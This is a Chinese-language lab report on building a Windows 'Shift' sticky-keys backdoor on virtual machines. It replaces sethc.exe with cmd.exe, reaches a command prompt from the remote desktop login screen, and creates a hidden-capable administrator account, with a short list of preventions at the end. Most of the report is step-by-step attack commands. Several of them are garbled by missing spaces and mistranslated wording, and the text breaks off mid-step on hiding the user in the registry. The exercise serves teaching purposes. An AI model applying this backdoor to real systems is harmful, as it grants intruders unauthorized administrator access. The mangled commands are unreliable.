一、实验目的及要求
学习创建Shift后门
掌握shift后门的原理
二、实验设备(环境)及要求
虚拟云平台,如PC、VC等
三、实验内容与步骤
在192.168.1.3虚拟机上打开cmd命令指示器;
2 .键入CDC :windowssystem32进入此文件夹。
3 .键入move sethc.exesethc.exe.bak,然后备份sethc.exe;
4 .键入copycmd.exesethc.exe,复制cmd.exe并改名为sethc.exe;
5 .打开控制面板-辅助功能选项-选中“使用粘性键”,点击APP应用程序;
打开192.168.1.2虚拟机,开始运行,然后键入mstsc打开远程登录程序;
7 .键入192.168.1.3,然后单击连接;
8 .显示登录界面后,按shift键5次进入目标cmd;
9 .在cmd中键入“net user hack 123 /add”以创建用户;
10 .然后输入" netlocalgroupadministratorshack/add "和" net user hack /active:yes ",向hack用户提取权利并激活;
11 .以hack用户身份登录到目标计算机。
四、实验结果与数据处理
192.168.1.3虚拟机的命令操作
2 .使用粘性键
在192.168.1.2虚拟机上远程登录到192.168.1.3虚拟机时创建用户。 然后,起诉并激活它
4 .成功登录到目标计算机
五、分析与讨论
1 .本实验利用应用“使用粘性按钮”后,windows系统按shift次调用“sethc.exe”APP应用的原理,复制cmd.exe并调用“sethc.exe”
2 .预防措施:
)1)禁用shift键粘滞功能;
)2)设置权限,使任何用户都不能访问和修改“sethc.exe”文件。
3 .如何创建隐藏用户:
创建用户后,按win r键,输入regedit回车,将注册表设置为HKEY _ local _ machinesoftwareMicrosoftwindows nt _ currerent